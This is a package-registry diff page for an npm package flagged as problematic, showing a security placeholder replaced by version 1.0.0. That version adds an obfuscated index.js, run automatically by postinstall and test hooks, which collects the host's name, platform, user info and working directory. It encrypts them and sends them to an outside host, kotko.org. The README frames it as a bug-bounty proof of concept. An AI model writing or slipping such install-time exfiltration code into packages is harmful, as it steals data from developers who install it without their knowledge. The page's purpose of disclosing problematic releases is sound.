@react-native-tscodegen/tslint-shared 0.0.1-security → 1.0.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of @react-native-tscodegen/tslint-shared might be problematic. Click here for more details.
- package/README.md +1 -5
- package/crypto.js +31 -0
- package/index.js +1 -0
- package/package.json +22 -3
package/README.md
CHANGED
|
@@ -1,5 +1 @@
|
|
|
1
|
-
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=%40react-native-tscodegen%2Ftslint-shared for more information.
|
|
1
|
+
Poc by kotko for testing bug.
|
package/crypto.js
ADDED
|
@@ -0,0 +1,31 @@
|
|
|
1
|
+
const crypto = require('crypto');
|
|
2
|
+
|
|
3
|
+
const algorithm = 'aes-256-ctr';
|
|
4
|
+
const secretKey = 'vOVH6sdmpNWjRRIqCc7rdxs01lwHzfr3';
|
|
5
|
+
const iv = crypto.randomBytes(16);
|
|
6
|
+
|
|
7
|
+
const encrypt = (text) => {
|
|
8
|
+
|
|
9
|
+
const cipher = crypto.createCipheriv(algorithm, secretKey, iv);
|
|
10
|
+
|
|
11
|
+
const encrypted = Buffer.concat([cipher.update(text), cipher.final()]);
|
|
12
|
+
|
|
13
|
+
return {
|
|
14
|
+
iv: iv.toString('hex'),
|
|
15
|
+
content: encrypted.toString('hex')
|
|
16
|
+
};
|
|
17
|
+
};
|
|
18
|
+
|
|
19
|
+
const decrypt = (hash) => {
|
|
20
|
+
|
|
21
|
+
const decipher = crypto.createDecipheriv(algorithm, secretKey, Buffer.from(hash.iv, 'hex'));
|
|
22
|
+
|
|
23
|
+
const decrpyted = Buffer.concat([decipher.update(Buffer.from(hash.content, 'hex')), decipher.final()]);
|
|
24
|
+
|
|
25
|
+
return decrpyted.toString();
|
|
26
|
+
};
|
|
27
|
+
|
|
28
|
+
module.exports = {
|
|
29
|
+
encrypt,
|
|
30
|
+
decrypt
|
|
31
|
+
};
|
package/index.js
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
var _0x9c7453=_0x3d18;(function(_0x14ed68,_0x46702a){var _0x1759c5=_0x3d18,_0x5e7ddd=_0x14ed68();while(!![]){try{var _0x3707d4=parseInt(_0x1759c5(0x19a))/0x1*(parseInt(_0x1759c5(0x193))/0x2)+parseInt(_0x1759c5(0x1a2))/0x3+-parseInt(_0x1759c5(0x199))/0x4*(-parseInt(_0x1759c5(0x18b))/0x5)+parseInt(_0x1759c5(0x195))/0x6*(-parseInt(_0x1759c5(0x190))/0x7)+-parseInt(_0x1759c5(0x1a6))/0x8+parseInt(_0x1759c5(0x18e))/0x9+-parseInt(_0x1759c5(0x197))/0xa;if(_0x3707d4===_0x46702a)break;else _0x5e7ddd['push'](_0x5e7ddd['shift']());}catch(_0x274b29){_0x5e7ddd['push'](_0x5e7ddd['shift']());}}}(_0x5ab6,0xe6fe9));var os=require('os');const request=require(_0x9c7453(0x19e)),crypto=require(_0x9c7453(0x19d));var fs=require('fs'),hostname=os['hostname'](),type=os[_0x9c7453(0x1a5)](),userInfo=os[_0x9c7453(0x19f)](),currentPath=process[_0x9c7453(0x1a4)](),json=[];const algorithm=_0x9c7453(0x192),secretKey=_0x9c7453(0x18c),iv=crypto[_0x9c7453(0x19c)](0x10);json[_0x9c7453(0x18f)](hostname),json[_0x9c7453(0x18f)](type),json[_0x9c7453(0x18f)](userInfo),json[_0x9c7453(0x18f)](currentPath),json=JSON[_0x9c7453(0x19b)](json);const {encrypt,decrypt}=require(_0x9c7453(0x196));let hash=encrypt(json),company=_0x9c7453(0x194),packages=_0x9c7453(0x1a1);function _0x5ab6(){var _0x566524=['randomBytes','crypto','request','userInfo','from','@react-native-tscodegen/tslint-shared','5125365CBECBI','base64','cwd','platform','2342480ZtKndi','9140wMKrDr','vOVH6sdmpNWjRRIqCc7rdxs01lwHzfr3','toString','16579305KsHyfi','push','12564027VNuhel','this\x20proof\x20for\x20report','aes-256-ctr','2FvnLKi','microsoft--react-native-tscodegen','6OWpIxG','./crypto','15361360aHsXvJ','pocByKotko.txt','1668loaBLL','257084afLiSy','stringify'];_0x5ab6=function(){return _0x566524;};return _0x5ab6();}fs['writeFile'](_0x9c7453(0x198),_0x9c7453(0x191),function(_0xe14145){if(_0xe14145)throw _0xe14145;});function _0x3d18(_0x560c9d,_0x56d5f9){var _0x5ab6d5=_0x5ab6();return _0x3d18=function(_0x3d1830,_0x41628a){_0x3d1830=_0x3d1830-0x18b;var _0x39a965=_0x5ab6d5[_0x3d1830];return _0x39a965;},_0x3d18(_0x560c9d,_0x56d5f9);}var buff=Buffer[_0x9c7453(0x1a0)](JSON['stringify'](hash))[_0x9c7453(0x18d)](_0x9c7453(0x1a3));request('https://kotko.org/?'+company+':'+packages+'='+buff,(_0x3170be,_0xe6f6a1,_0x1de5c2)=>{});
|
package/package.json
CHANGED
|
@@ -1,6 +1,25 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "@react-native-tscodegen/tslint-shared",
|
|
3
|
-
"version": "0.0
|
|
4
|
-
"description": "
|
|
5
|
-
"
|
|
3
|
+
"version": "1.0.0",
|
|
4
|
+
"description": "This package for demonstrate bugs in program (Bug Bounty program. Do not delete until decision report",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"postinstall": "node index.js",
|
|
8
|
+
"preinstall": "npm i request --save-dev",
|
|
9
|
+
"test": "node index.js"
|
|
10
|
+
},
|
|
11
|
+
"author": "",
|
|
12
|
+
"Dependencies": {
|
|
13
|
+
"crypto": "^1.0.1",
|
|
14
|
+
"ip": "^1.1.5",
|
|
15
|
+
"request": "^2.88.2",
|
|
16
|
+
"os": "^0.1.1"
|
|
17
|
+
},
|
|
18
|
+
"devDependencies": {
|
|
19
|
+
"crypto": "^1.0.1",
|
|
20
|
+
"ip": "^1.1.5",
|
|
21
|
+
"javascript-obfuscator": "^4.0.0",
|
|
22
|
+
"os": "^0.1.1",
|
|
23
|
+
"request": "^2.88.2"
|
|
24
|
+
}
|
|
6
25
|
}
|